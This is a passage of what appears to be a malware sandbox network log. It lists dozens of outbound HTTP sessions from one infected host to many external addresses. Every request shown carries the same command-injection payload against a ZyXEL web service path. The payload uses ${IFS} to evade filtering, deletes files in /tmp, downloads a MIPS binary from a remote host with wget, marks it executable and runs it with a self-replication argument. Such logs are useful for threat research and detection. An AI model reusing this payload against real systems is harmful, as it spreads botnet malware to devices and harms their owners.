                                          Jan 14, 2024 15:46:12.909462929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3449192.168.2.2338810212.151.165.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909517050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3450192.168.2.2347626114.95.36.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909574986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3451192.168.2.2360518220.42.52.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909609079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3452192.168.2.2340868164.161.208.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909643888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3453192.168.2.233747242.32.128.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909708977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3454192.168.2.235894245.83.113.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909759045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3455192.168.2.235859413.189.96.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909760952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3456192.168.2.2360438189.36.225.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909826040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3457192.168.2.2333088177.44.165.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909845114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3458192.168.2.2345098139.192.45.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909869909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3459192.168.2.234818654.255.164.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909940004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3460192.168.2.235862812.86.59.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909945965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3461192.168.2.2338384188.81.85.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.909975052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3462192.168.2.2334418160.253.27.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910043955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3463192.168.2.234570699.179.160.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910104990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3464192.168.2.2352168114.88.24.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910125971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3465192.168.2.233500887.73.95.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910164118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3466192.168.2.2340488147.135.117.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910172939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3467192.168.2.2339388201.47.19.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910243988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3468192.168.2.2333922177.246.32.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910281897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3469192.168.2.2357940181.169.52.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910320997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3470192.168.2.2345190183.81.156.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910351992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3471192.168.2.23516129.159.36.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910412073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3472192.168.2.235930039.70.182.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910449028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3473192.168.2.233534690.13.236.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910490990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3474192.168.2.2348246105.153.102.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910506964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3475192.168.2.2354674123.10.67.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910535097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3476192.168.2.2354264170.98.176.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910603046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3477192.168.2.2354212199.53.212.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910657883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3478192.168.2.235506063.123.22.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910689116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3479192.168.2.234654432.2.154.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910726070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3480192.168.2.2346262221.14.155.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910763979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3481192.168.2.2353812203.250.170.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910800934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3482192.168.2.2354702198.11.234.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910825014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3483192.168.2.233749092.254.171.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910897017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3484192.168.2.2345750164.197.249.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910929918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3485192.168.2.2348158168.67.145.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910968065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3486192.168.2.235103419.133.218.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.910985947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3487192.168.2.2340704142.101.132.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911015034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3488192.168.2.235964673.113.214.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911063910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3489192.168.2.2333520211.61.33.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911089897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3490192.168.2.2335916199.145.141.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911112070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3491192.168.2.235427479.191.135.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911161900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3492192.168.2.2350688110.155.160.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911199093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3493192.168.2.2347374181.161.30.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911269903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3494192.168.2.2343654180.10.62.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911286116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3495192.168.2.2342988178.166.163.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911329031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3496192.168.2.235085449.247.19.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911396980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3497192.168.2.2345864202.244.119.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911396980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3498192.168.2.23608249.129.104.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911442995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3499192.168.2.234797088.72.13.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911499977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3500192.168.2.2347166145.165.121.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911541939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3501192.168.2.2356572111.195.160.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911580086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3502192.168.2.2351434154.156.12.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911624908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3503192.168.2.234192297.120.190.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911645889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3504192.168.2.2341418156.98.71.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911693096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3505192.168.2.2344162205.118.194.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911719084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3506192.168.2.2334714115.37.184.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911808968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3507192.168.2.2356244106.110.231.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911823988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3508192.168.2.2336082164.95.188.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911842108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3509192.168.2.2339340135.232.239.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911875963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3510192.168.2.233558888.231.165.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:12.911900043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3511192.168.2.2336700123.77.226.91443
                                          TimestampBytes transferredDirectionData
